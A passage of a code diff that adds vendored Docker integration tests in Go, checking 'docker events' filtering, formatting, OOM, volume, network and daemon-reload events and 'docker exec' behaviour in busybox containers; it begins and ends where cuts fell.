*DockerSuite) TestEventsSinceInTheFuture(c *check.C) { + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + since := daemonTime(c) + until := since.Add(time.Duration(-24) * time.Hour) + out, _, err := dockerCmdWithError("events", "--filter", "image=busybox", "--since", parseEventTime(since), "--until", parseEventTime(until)) + + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "cannot be after `until`") +} + +func (s *DockerSuite) TestEventsUntilInThePast(c *check.C) { + since := daemonUnixTime(c) + + dockerCmd(c, "run", "--name", "test-container", "-d", "busybox", "true") + waitRun("test-container") + + until := daemonUnixTime(c) + + dockerCmd(c, "run", "--name", "test-container2", "-d", "busybox", "true") + waitRun("test-container2") + + out, _ := dockerCmd(c, "events", "--filter", "image=busybox", "--since", since, "--until", until) + + c.Assert(out, checker.Not(checker.Contains), "test-container2") + c.Assert(out, checker.Contains, "test-container") +} + +func (s *DockerSuite) TestEventsFormat(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "--rm", "busybox", "true") + dockerCmd(c, "run", "--rm", "busybox", "true") + out, _ := dockerCmd(c, "events", "--since", since, "--until", daemonUnixTime(c), "--format", "{{json .}}") + dec := json.NewDecoder(strings.NewReader(out)) + // make sure we got 2 start events + startCount := 0 + for { + var err error + var ev eventtypes.Message + if err = dec.Decode(&ev); err == io.EOF { + break + } + c.Assert(err, checker.IsNil) + if ev.Status == "start" { + startCount++ + } + } + + c.Assert(startCount, checker.Equals, 2, check.Commentf("should have had 2 start events but had %d, out: %s", startCount, out)) +} + +func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { + // make sure it fails immediately, without receiving any event + result := dockerCmdWithResult("events", "--format", "{{badFuncString .}}") + c.Assert(result, icmd.Matches, 
icmd.Expected{ + Error: "exit status 64", + ExitCode: 64, + Err: "Error parsing format: template: :1: function \"badFuncString\" not defined", + }) +} + +func (s *DockerSuite) TestEventsFormatBadField(c *check.C) { + // make sure it fails immediately, without receiving any event + result := dockerCmdWithResult("events", "--format", "{{.badFieldString}}") + c.Assert(result, icmd.Matches, icmd.Expected{ + Error: "exit status 64", + ExitCode: 64, + Err: "Error parsing format: template: :1:2: executing \"\" at <.badFieldString>: can't evaluate field badFieldString in type *events.Message", + }) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go new file mode 100644 index 0000000000..dc91667116 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_unix_test.go @@ -0,0 +1,486 @@ +// +build !windows + +package main + +import ( + "bufio" + "bytes" + "fmt" + "io/ioutil" + "os" + "os/exec" + "strings" + "syscall" + "time" + "unicode" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" + "github.com/kr/pty" +) + +// #5979 +func (s *DockerSuite) TestEventsRedirectStdout(c *check.C) { + since := daemonUnixTime(c) + dockerCmd(c, "run", "busybox", "true") + + file, err := ioutil.TempFile("", "") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file")) + defer os.Remove(file.Name()) + + command := fmt.Sprintf("%s events --since=%s --until=%s > %s", dockerBinary, since, daemonUnixTime(c), file.Name()) + _, tty, err := pty.Open() + c.Assert(err, checker.IsNil, check.Commentf("Could not open pty")) + cmd := exec.Command("sh", "-c", command) + cmd.Stdin = tty + cmd.Stdout = tty + cmd.Stderr = tty + c.Assert(cmd.Run(), checker.IsNil, check.Commentf("run err for command %q", command)) + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + for _, ch := range scanner.Text() 
{ + c.Assert(unicode.IsControl(ch), checker.False, check.Commentf("found control character %v", []byte(string(ch)))) + } + } + c.Assert(scanner.Err(), checker.IsNil, check.Commentf("Scan err for command %q", command)) + +} + +func (s *DockerSuite) TestEventsOOMDisableFalse(c *check.C) { + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, swapMemorySupport) + + errChan := make(chan error) + go func() { + defer close(errChan) + out, exitCode, _ := dockerCmdWithError("run", "--name", "oomFalse", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(30 * time.Second): + c.Fatal("Timeout waiting for container to die on OOM") + } + + out, _ := dockerCmd(c, "events", "--since=0", "-f", "container=oomFalse", "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSuffix(out, "\n"), "\n") + nEvents := len(events) + + c.Assert(nEvents, checker.GreaterOrEqualThan, 5) //Missing expected event + c.Assert(parseEventAction(c, events[nEvents-5]), checker.Equals, "create") + c.Assert(parseEventAction(c, events[nEvents-4]), checker.Equals, "attach") + c.Assert(parseEventAction(c, events[nEvents-3]), checker.Equals, "start") + c.Assert(parseEventAction(c, events[nEvents-2]), checker.Equals, "oom") + c.Assert(parseEventAction(c, events[nEvents-1]), checker.Equals, "die") +} + +func (s *DockerSuite) TestEventsOOMDisableTrue(c *check.C) { + testRequires(c, DaemonIsLinux, oomControl, memoryLimitSupport, NotArm, swapMemorySupport) + + errChan := make(chan error) + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + go func() { + defer close(errChan) + out, exitCode, _ := 
dockerCmdWithError("run", "--oom-kill-disable=true", "--name", "oomTrue", "-m", "10MB", "busybox", "sh", "-c", "x=a; while true; do x=$x$x$x$x; done") + if expected := 137; exitCode != expected { + errChan <- fmt.Errorf("wrong exit code for OOM container: expected %d, got %d (output: %q)", expected, exitCode, out) + } + }() + + c.Assert(waitRun("oomTrue"), checker.IsNil) + defer dockerCmd(c, "kill", "oomTrue") + containerID := inspectField(c, "oomTrue", "Id") + + testActions := map[string]chan bool{ + "oom": make(chan bool), + } + + matcher := matchEventLine(containerID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(20 * time.Second): + observer.CheckEventError(c, containerID, "oom", matcher) + case <-testActions["oom"]: + // ignore, done + case errRun := <-errChan: + if errRun != nil { + c.Fatalf("%v", errRun) + } else { + c.Fatalf("container should be still running but it's not") + } + } + + status := inspectField(c, "oomTrue", "State.Status") + c.Assert(strings.TrimSpace(status), checker.Equals, "running", check.Commentf("container should be still running")) +} + +// #18453 +func (s *DockerSuite) TestEventsContainerFilterByName(c *check.C) { + testRequires(c, DaemonIsLinux) + cOut, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + c1 := strings.TrimSpace(cOut) + waitRun("foo") + cOut, _ = dockerCmd(c, "run", "--name=bar", "-d", "busybox", "top") + c2 := strings.TrimSpace(cOut) + waitRun("bar") + out, _ := dockerCmd(c, "events", "-f", "container=foo", "--since=0", "--until", daemonUnixTime(c)) + c.Assert(out, checker.Contains, c1, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), c2, check.Commentf(out)) +} + +// #18453 +func (s *DockerSuite) TestEventsContainerFilterBeforeCreate(c *check.C) { + testRequires(c, DaemonIsLinux) + buf := &bytes.Buffer{} + cmd := exec.Command(dockerBinary, "events", "-f", "container=foo", "--since=0") + 
cmd.Stdout = buf + c.Assert(cmd.Start(), check.IsNil) + defer cmd.Wait() + defer cmd.Process.Kill() + + // Sleep for a second to make sure we are testing the case where events are listened before container starts. + time.Sleep(time.Second) + id, _ := dockerCmd(c, "run", "--name=foo", "-d", "busybox", "top") + cID := strings.TrimSpace(id) + for i := 0; ; i++ { + out := buf.String() + if strings.Contains(out, cID) { + break + } + if i > 30 { + c.Fatalf("Missing event of container (foo, %v), got %q", cID, out) + } + time.Sleep(500 * time.Millisecond) + } +} + +func (s *DockerSuite) TestVolumeEvents(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + // Observe create/mount volume actions + dockerCmd(c, "volume", "create", "test-event-volume-local") + dockerCmd(c, "run", "--name", "test-volume-container", "--volume", "test-event-volume-local:/foo", "-d", "busybox", "true") + waitRun("test-volume-container") + + // Observe unmount/destroy volume actions + dockerCmd(c, "rm", "-f", "test-volume-container") + dockerCmd(c, "volume", "rm", "test-event-volume-local") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 4) + + volumeEvents := eventActionsByIDAndType(c, events, "test-event-volume-local", "volume") + c.Assert(volumeEvents, checker.HasLen, 4) + c.Assert(volumeEvents[0], checker.Equals, "create") + c.Assert(volumeEvents[1], checker.Equals, "mount") + c.Assert(volumeEvents[2], checker.Equals, "unmount") + c.Assert(volumeEvents[3], checker.Equals, "destroy") +} + +func (s *DockerSuite) TestNetworkEvents(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + // Observe create/connect network actions + dockerCmd(c, "network", "create", "test-event-network-local") + dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local", "-d", 
"busybox", "true") + waitRun("test-network-container") + + // Observe disconnect/destroy network actions + dockerCmd(c, "rm", "-f", "test-network-container") + dockerCmd(c, "network", "rm", "test-event-network-local") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterThan, 4) + + netEvents := eventActionsByIDAndType(c, events, "test-event-network-local", "network") + c.Assert(netEvents, checker.HasLen, 4) + c.Assert(netEvents[0], checker.Equals, "create") + c.Assert(netEvents[1], checker.Equals, "connect") + c.Assert(netEvents[2], checker.Equals, "disconnect") + c.Assert(netEvents[3], checker.Equals, "destroy") +} + +func (s *DockerSuite) TestEventsContainerWithMultiNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Observe create/connect network actions + dockerCmd(c, "network", "create", "test-event-network-local-1") + dockerCmd(c, "network", "create", "test-event-network-local-2") + dockerCmd(c, "run", "--name", "test-network-container", "--net", "test-event-network-local-1", "-td", "busybox", "sh") + waitRun("test-network-container") + dockerCmd(c, "network", "connect", "test-event-network-local-2", "test-network-container") + + since := daemonUnixTime(c) + + dockerCmd(c, "stop", "-t", "1", "test-network-container") + + until := daemonUnixTime(c) + out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "-f", "type=network") + netEvents := strings.Split(strings.TrimSpace(out), "\n") + + // received two network disconnect events + c.Assert(len(netEvents), checker.Equals, 2) + c.Assert(netEvents[0], checker.Contains, "disconnect") + c.Assert(netEvents[1], checker.Contains, "disconnect") + + //both networks appeared in the network event output + c.Assert(out, checker.Contains, "test-event-network-local-1") + c.Assert(out, checker.Contains, "test-event-network-local-2") +} + +func (s *DockerSuite) 
TestEventsStreaming(c *check.C) { + testRequires(c, DaemonIsLinux) + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + out, _ := dockerCmd(c, "run", "-d", "busybox:latest", "true") + containerID := strings.TrimSpace(out) + + testActions := map[string]chan bool{ + "create": make(chan bool, 1), + "start": make(chan bool, 1), + "die": make(chan bool, 1), + "destroy": make(chan bool, 1), + } + + matcher := matchEventLine(containerID, "container", testActions) + processor := processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "create", matcher) + case <-testActions["create"]: + // ignore, done + } + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "start", matcher) + case <-testActions["start"]: + // ignore, done + } + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "die", matcher) + case <-testActions["die"]: + // ignore, done + } + + dockerCmd(c, "rm", containerID) + + select { + case <-time.After(5 * time.Second): + observer.CheckEventError(c, containerID, "destroy", matcher) + case <-testActions["destroy"]: + // ignore, done + } +} + +func (s *DockerSuite) TestEventsImageUntagDelete(c *check.C) { + testRequires(c, DaemonIsLinux) + + observer, err := newEventObserver(c) + c.Assert(err, checker.IsNil) + err = observer.Start() + c.Assert(err, checker.IsNil) + defer observer.Stop() + + name := "testimageevents" + imageID, err := buildImage(name, + `FROM scratch + MAINTAINER "docker"`, + true) + c.Assert(err, checker.IsNil) + c.Assert(deleteImages(name), checker.IsNil) + + testActions := map[string]chan bool{ + "untag": make(chan bool, 1), + "delete": make(chan bool, 1), + } + + matcher := matchEventLine(imageID, "image", testActions) + processor := 
processEventMatch(testActions) + go observer.Match(matcher, processor) + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, imageID, "untag", matcher) + case <-testActions["untag"]: + // ignore, done + } + + select { + case <-time.After(10 * time.Second): + observer.CheckEventError(c, imageID, "delete", matcher) + case <-testActions["delete"]: + // ignore, done + } +} + +func (s *DockerSuite) TestEventsFilterVolumeAndNetworkType(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "network", "create", "test-event-network-type") + dockerCmd(c, "volume", "create", "test-event-volume-type") + + out, _ := dockerCmd(c, "events", "--filter", "type=volume", "--filter", "type=network", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(events), checker.GreaterOrEqualThan, 2, check.Commentf(out)) + + networkActions := eventActionsByIDAndType(c, events, "test-event-network-type", "network") + volumeActions := eventActionsByIDAndType(c, events, "test-event-volume-type", "volume") + + c.Assert(volumeActions[0], checker.Equals, "create") + c.Assert(networkActions[0], checker.Equals, "create") +} + +func (s *DockerSuite) TestEventsFilterVolumeID(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "volume", "create", "test-event-volume-id") + out, _ := dockerCmd(c, "events", "--filter", "volume=test-event-volume-id", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + + c.Assert(events[0], checker.Contains, "test-event-volume-id") + c.Assert(events[0], checker.Contains, "driver=local") +} + +func (s *DockerSuite) TestEventsFilterNetworkID(c *check.C) { + testRequires(c, DaemonIsLinux) + + since := daemonUnixTime(c) + + dockerCmd(c, "network", "create", "test-event-network-local") + out, _ := dockerCmd(c, 
"events", "--filter", "network=test-event-network-local", "--since", since, "--until", daemonUnixTime(c)) + events := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(events, checker.HasLen, 1) + + c.Assert(events[0], checker.Contains, "test-event-network-local") + c.Assert(events[0], checker.Contains, "type=bridge") +} + +func (s *DockerDaemonSuite) TestDaemonEvents(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{"labels":["foo=bar"]}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + // Get daemon ID + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + daemonID := "" + daemonName := "" + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(line, "ID: ") { + daemonID = strings.TrimPrefix(line, "ID: ") + } else if strings.HasPrefix(line, "Name: ") { + daemonName = strings.TrimPrefix(line, "Name: ") + } + } + c.Assert(daemonID, checker.Not(checker.Equals), "") + + configFile, err = os.Create(configFilePath) + c.Assert(err, checker.IsNil) + daemonConfig = `{"max-concurrent-downloads":1,"labels":["bar=foo"], "shutdown-timeout": 10}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c)) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s (cluster-advertise=, cluster-store=, cluster-store-opts={}, debug=true, default-runtime=runc, insecure-registries=[], labels=[\"bar=foo\"], live-restore=false, max-concurrent-downloads=1, max-concurrent-uploads=5, name=%s, runtimes=runc:{docker-runc []}, shutdown-timeout=10)", 
daemonID, daemonName)) +} + +func (s *DockerDaemonSuite) TestDaemonEventsWithFilters(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + // daemon config file + configFilePath := "test.json" + configFile, err := os.Create(configFilePath) + c.Assert(err, checker.IsNil) + defer os.Remove(configFilePath) + + daemonConfig := `{"labels":["foo=bar"]}` + fmt.Fprintf(configFile, "%s", daemonConfig) + configFile.Close() + c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + + // Get daemon ID + out, err := s.d.Cmd("info") + c.Assert(err, checker.IsNil) + daemonID := "" + daemonName := "" + for _, line := range strings.Split(out, "\n") { + if strings.HasPrefix(line, "ID: ") { + daemonID = strings.TrimPrefix(line, "ID: ") + } else if strings.HasPrefix(line, "Name: ") { + daemonName = strings.TrimPrefix(line, "Name: ") + } + } + c.Assert(daemonID, checker.Not(checker.Equals), "") + + syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + + time.Sleep(3 * time.Second) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonID)) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", fmt.Sprintf("daemon=%s", daemonName)) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "daemon=foo") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), "--filter", "type=daemon") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("daemon reload %s", daemonID)) + + out, err = s.d.Cmd("events", "--since=0", "--until", daemonUnixTime(c), 
"--filter", "type=container") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), fmt.Sprintf("daemon reload %s", daemonID)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go new file mode 100644 index 0000000000..cac76d96ae --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go @@ -0,0 +1,601 @@ +// +build !test_no_exec + +package main + +import ( + "bufio" + "fmt" + "net/http" + "os" + "os/exec" + "reflect" + "runtime" + "sort" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExec(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top") + c.Assert(waitRun(strings.TrimSpace(out)), check.IsNil) + + out, _ = dockerCmd(c, "exec", "testing", "cat", "/tmp/file") + out = strings.Trim(out, "\r\n") + c.Assert(out, checker.Equals, "test") + +} + +func (s *DockerSuite) TestExecInteractive(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "sh", "-c", "echo test > /tmp/file && top") + + execCmd := exec.Command(dockerBinary, "exec", "-i", "testing", "sh") + stdin, err := execCmd.StdinPipe() + c.Assert(err, checker.IsNil) + stdout, err := execCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + + err = execCmd.Start() + c.Assert(err, checker.IsNil) + _, err = stdin.Write([]byte("cat /tmp/file\n")) + c.Assert(err, checker.IsNil) + + r := bufio.NewReader(stdout) + line, err := r.ReadString('\n') + c.Assert(err, checker.IsNil) + line = strings.TrimSpace(line) + c.Assert(line, checker.Equals, "test") + err = stdin.Close() + c.Assert(err, checker.IsNil) + errChan := make(chan error) + go func() { + errChan 
<- execCmd.Wait() + close(errChan) + }() + select { + case err := <-errChan: + c.Assert(err, checker.IsNil) + case <-time.After(1 * time.Second): + c.Fatal("docker exec failed to exit on stdin close") + } + +} + +func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { + out, _ := runSleepingContainer(c) + cleanedContainerID := strings.TrimSpace(out) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + dockerCmd(c, "restart", cleanedContainerID) + c.Assert(waitRun(cleanedContainerID), check.IsNil) + + out, _ = dockerCmd(c, "exec", cleanedContainerID, "echo", "hello") + outStr := strings.TrimSpace(out) + c.Assert(outStr, checker.Equals, "hello") +} + +func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) { + // TODO Windows CI: Requires a little work to get this ported. + testRequires(c, DaemonIsLinux) + testRequires(c, SameHostDaemon) + + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top") + c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out)) + + err = s.d.Restart() + c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon")) + + out, err = s.d.Cmd("start", "top") + c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out)) + + out, err = s.d.Cmd("exec", "top", "echo", "hello") + c.Assert(err, checker.IsNil, check.Commentf("Could not exec on container top: %s", out)) + + outStr := strings.TrimSpace(string(out)) + c.Assert(outStr, checker.Equals, "hello") +} + +// Regression test for #9155, #9044 +func (s *DockerSuite) TestExecEnv(c *check.C) { + // TODO Windows CI: This one is interesting and may just end up being a feature + // difference between Windows and Linux. On Windows, the environment is passed + // into the process that is launched, not into the machine environment. 
Hence + // a subsequent exec will not have LALA set/ + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-e", "LALA=value1", "-e", "LALA=value2", "-d", "--name", "testing") + c.Assert(waitRun("testing"), check.IsNil) + + out, _ := dockerCmd(c, "exec", "testing", "env") + c.Assert(out, checker.Not(checker.Contains), "LALA=value1") + c.Assert(out, checker.Contains, "LALA=value2") + c.Assert(out, checker.Contains, "HOME=/root") +} + +func (s *DockerSuite) TestExecSetEnv(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "-e", "HOME=/root", "-d", "--name", "testing") + c.Assert(waitRun("testing"), check.IsNil) + + out, _ := dockerCmd(c, "exec", "-e", "HOME=/another", "-e", "ABC=xyz", "testing", "env") + c.Assert(out, checker.Not(checker.Contains), "HOME=/root") + c.Assert(out, checker.Contains, "HOME=/another") + c.Assert(out, checker.Contains, "ABC=xyz") +} + +func (s *DockerSuite) TestExecExitStatus(c *check.C) { + runSleepingContainer(c, "-d", "--name", "top") + + result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23") + c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) +} + +func (s *DockerSuite) TestExecPausedContainer(c *check.C) { + testRequires(c, IsPausable) + defer unpauseAllContainers() + + out, _ := runSleepingContainer(c, "-d", "--name", "testing") + ContainerID := strings.TrimSpace(out) + + dockerCmd(c, "pause", "testing") + out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello") + c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused")) + + expected := ContainerID + " is paused, unpause the container before exec" + c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused")) +} + +// regression test for #9476 +func (s *DockerSuite) TestExecTTYCloseStdin(c *check.C) { + // TODO Windows CI: This requires some work to port to Windows. 
+ testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "-it", "--name", "exec_tty_stdin", "busybox") + + cmd := exec.Command(dockerBinary, "exec", "-i", "exec_tty_stdin", "cat") + stdinRw, err := cmd.StdinPipe() + c.Assert(err, checker.IsNil) + + stdinRw.Write([]byte("test")) + stdinRw.Close() + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, _ = dockerCmd(c, "top", "exec_tty_stdin") + outArr := strings.Split(out, "\n") + c.Assert(len(outArr), checker.LessOrEqualThan, 3, check.Commentf("exec process left running")) + c.Assert(out, checker.Not(checker.Contains), "nsenter-exec") +} + +func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "-ti", "busybox") + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + errChan := make(chan error) + go func() { + defer close(errChan) + + cmd := exec.Command(dockerBinary, "exec", "-ti", id, "true") + if _, err := cmd.StdinPipe(); err != nil { + errChan <- err + return + } + + expected := "the input device is not a TTY" + if runtime.GOOS == "windows" { + expected += ". If you are using mintty, try prefixing the command with 'winpty'" + } + if out, _, err := runCommandWithOutput(cmd); err == nil { + errChan <- fmt.Errorf("exec should have failed") + return + } else if !strings.Contains(out, expected) { + errChan <- fmt.Errorf("exec failed with error %q: expected %q", out, expected) + return + } + }() + + select { + case err := <-errChan: + c.Assert(err, check.IsNil) + case <-time.After(3 * time.Second): + c.Fatal("exec is running but should have failed") + } +} + +func (s *DockerSuite) TestExecParseError(c *check.C) { + // TODO Windows CI: Requires some extra work. Consider copying the + // runSleepingContainer helper to have an exec version. 
+ testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top") + + // Test normal (non-detached) case first + cmd := exec.Command(dockerBinary, "exec", "top") + _, stderr, _, err := runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stderr, checker.Contains, "See 'docker exec --help'") +} + +func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { + // TODO Windows CI: Requires some extra work. Consider copying the + // runSleepingContainer helper to have an exec version. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") + + err := exec.Command(dockerBinary, "exec", "testing", "top").Start() + c.Assert(err, checker.IsNil) + + type dstop struct { + out []byte + err error + } + + ch := make(chan dstop) + go func() { + out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput() + ch <- dstop{out, err} + close(ch) + }() + select { + case <-time.After(3 * time.Second): + c.Fatal("Container stop timed out") + case s := <-ch: + c.Assert(s.err, check.IsNil) + } +} + +func (s *DockerSuite) TestExecCgroup(c *check.C) { + // Not applicable on Windows - using Linux specific functionality + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") + + out, _ := dockerCmd(c, "exec", "testing", "cat", "/proc/1/cgroup") + containerCgroups := sort.StringSlice(strings.Split(out, "\n")) + + var wg sync.WaitGroup + var mu sync.Mutex + execCgroups := []sort.StringSlice{} + errChan := make(chan error) + // exec a few times concurrently to get consistent failure + for i := 0; i < 5; i++ { + wg.Add(1) + go func() { + out, _, err := dockerCmdWithError("exec", "testing", "cat", "/proc/self/cgroup") + if err != nil { + errChan <- err + return + } + cg := sort.StringSlice(strings.Split(out, "\n")) + + mu.Lock() + execCgroups = append(execCgroups, cg) + mu.Unlock() + wg.Done() + }() + } + 
wg.Wait() + close(errChan) + + for err := range errChan { + c.Assert(err, checker.IsNil) + } + + for _, cg := range execCgroups { + if !reflect.DeepEqual(cg, containerCgroups) { + fmt.Println("exec cgroups:") + for _, name := range cg { + fmt.Printf(" %s\n", name) + } + + fmt.Println("container cgroups:") + for _, name := range containerCgroups { + fmt.Printf(" %s\n", name) + } + c.Fatal("cgroups mismatched") + } + } +} + +func (s *DockerSuite) TestExecInspectID(c *check.C) { + out, _ := runSleepingContainer(c, "-d") + id := strings.TrimSuffix(out, "\n") + + out = inspectField(c, id, "ExecIDs") + c.Assert(out, checker.Equals, "[]", check.Commentf("ExecIDs should be empty, got: %s", out)) + + // Start an exec, have it block waiting so we can do some checking + cmd := exec.Command(dockerBinary, "exec", id, "sh", "-c", + "while ! test -e /execid1; do sleep 1; done") + + err := cmd.Start() + c.Assert(err, checker.IsNil, check.Commentf("failed to start the exec cmd")) + + // Give the exec 10 chances/seconds to start then give up and stop the test + tries := 10 + for i := 0; i < tries; i++ { + // Since its still running we should see exec as part of the container + out = strings.TrimSpace(inspectField(c, id, "ExecIDs")) + + if out != "[]" && out != "" { + break + } + c.Assert(i+1, checker.Not(checker.Equals), tries, check.Commentf("ExecIDs still empty after 10 second")) + time.Sleep(1 * time.Second) + } + + // Save execID for later + execID, err := inspectFilter(id, "index .ExecIDs 0") + c.Assert(err, checker.IsNil, check.Commentf("failed to get the exec id")) + + // End the exec by creating the missing file + err = exec.Command(dockerBinary, "exec", id, + "sh", "-c", "touch /execid1").Run() + + c.Assert(err, checker.IsNil, check.Commentf("failed to run the 2nd exec cmd")) + + // Wait for 1st exec to complete + cmd.Wait() + + // Give the exec 10 chances/seconds to stop then give up and stop the test + for i := 0; i < tries; i++ { + // Since its still running we should 
